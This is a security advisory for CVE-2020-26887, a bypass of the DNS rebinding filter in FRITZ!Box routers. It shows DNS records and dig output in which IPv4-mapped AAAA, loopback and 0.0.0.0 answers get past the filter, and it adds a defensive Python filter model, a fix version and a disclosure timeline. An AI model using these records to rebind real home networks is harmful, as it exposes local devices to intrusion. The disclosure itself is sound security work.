FRITZ!Box DNS Rebinding Protection Bypass

RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows DNS answers pointing to IP addresses in the private local network to be returned to clients, despite the DNS rebinding protection mechanism.

Details

  • Product: FRITZ!Box 7490 and potentially others
  • Affected Versions: 7.20 and below
  • Fixed Versions: >= 7.21
  • Vulnerability Type: Bypass
  • Security Risk: low
  • Vendor URL: https://en.avm.de/
  • Vendor Status: fixed version released
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003
  • Advisory Status: published
  • CVE: 2020-26887
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887

Introduction

“For security reasons, the FRITZ!Box suppresses DNS responses that refer to IP addresses in its own home network. This is a security function of the FRITZ!Box to protect against what are known as DNS rebinding attacks.”

(from the vendor’s homepage)

More Details

FRITZ!Box router devices employ a protection mechanism against DNS rebinding attacks: if a DNS answer points to an IP address in the private network range of the router, the answer is suppressed. Suppose the FRITZ!Box router's DHCP server is in its default configuration and serves the private IP range 192.168.178.1/24. If a connected device makes a DNS request which resolves to an IPv4 address in the configured private IP range (for example 192.168.178.20), an empty answer is returned. However, if the DNS answer instead contains an AAAA record carrying the same private IPv4 address in its IPv4-mapped IPv6 representation (::ffff:192.168.178.20), it is returned successfully. Furthermore, DNS answers which resolve to the loopback address 127.0.0.1 or the special address 0.0.0.0 are returned, too.

Proof of Concept

Supposing the following resource records (RR) are configured for different subdomains of example.com:

private.example.com.       1  IN  A     192.168.178.20
local.example.com.         1  IN  A     127.0.0.1
privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20

A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected:

$ dig private.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com. IN  A

DNS requests for the subdomains privateipv6.example.com and local.example.com return the configured resource records successfully, effectively bypassing the DNS rebinding protection:

$ dig privateipv6.example.com @192.168.178.1 AAAA
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com. IN  AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1    IN  AAAA    ::ffff:192.168.178.20


$ dig local.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.   IN  A

;; ANSWER SECTION:
local.example.com. 1  IN  A   127.0.0.1
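To make the gap in the filter described under "More Details" concrete, the following added example (not AVM's code and not part of the advisory) models a rebinding filter that only inspects A records beside a hardened one that unwraps IPv4-mapped IPv6 addresses and also rejects loopback and unspecified addresses. The LAN prefix and the records are constructed from the values in this advisory, plus one public documentation-range address that a correct filter must let through.

```python
import ipaddress
from typing import List, Tuple

# Constructed: the FRITZ!Box default LAN prefix named in the advisory.
LAN = ipaddress.ip_network("192.168.178.0/24")

# Constructed records: the three from the proof of concept plus one public
# (documentation-range) address that a correct filter must not suppress.
RECORDS: List[Tuple[str, str, str]] = [
    ("private.example.com",     "A",    "192.168.178.20"),
    ("local.example.com",       "A",    "127.0.0.1"),
    ("privateipv6.example.com", "AAAA", "::ffff:192.168.178.20"),
    ("www.example.com",         "A",    "203.0.113.10"),
]


def weak_filter(rrtype: str, rdata: str) -> bool:
    """Suppress only A records inside the LAN prefix, modelling the pre-7.21
    behaviour the advisory describes. AAAA answers, loopback and 0.0.0.0
    are never suppressed by this check."""
    return rrtype == "A" and ipaddress.ip_address(rdata) in LAN


def hardened_filter(rrtype: str, rdata: str) -> bool:
    """Suppress A and AAAA answers that, after unwrapping IPv4-mapped IPv6
    (::ffff:a.b.c.d), point into the LAN, at loopback, or at the unspecified
    address. Unparsable address data fails closed."""
    if rrtype not in ("A", "AAAA"):
        return False
    try:
        addr = ipaddress.ip_address(rdata)
    except ValueError:
        return True
    # ::ffff:192.168.178.20 names the same host as 192.168.178.20: compare as IPv4.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    if addr.is_loopback or addr.is_unspecified:
        return True
    return addr.version == 4 and addr in LAN


def surviving(records, flt) -> List[str]:
    """Names whose answers a LAN client would receive under the given filter."""
    return [name for name, rrtype, rdata in records if not flt(rrtype, rdata)]


if __name__ == "__main__":
    print("weak:    ", surviving(RECORDS, weak_filter))
    print("hardened:", surviving(RECORDS, hardened_filter))
```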

Workaround

None.

Fix

The problem is corrected in FRITZ!OS 7.21.

Security Risk

As shown, the DNS rebinding protection of FRITZ!Box routers can be bypassed, allowing for DNS rebinding attacks against connected devices. However, this type of attack is only possible if vulnerable services which are reachable over HTTP without authentication are present in the local network. The web interface of FRITZ!Box routers, for example, is not vulnerable to this type of attack, since the HTTP Host header is checked against known domains. For this reason, the risk is estimated to be low.

Timeline

  • 2020-06-23 Vulnerability identified
  • 2020-07-08 Vendor notified
  • 2020-07-20 Vendor provided fixed version to RedTeam Pentesting
  • 2020-07-23 Vendor notified of another problematic IP
  • 2020-08-06 Vendor provided fixed version to RedTeam Pentesting
  • 2020-10-06 Vendor starts distribution of fixed version for selected devices
  • 2020-10-19 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance public knowledge through research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/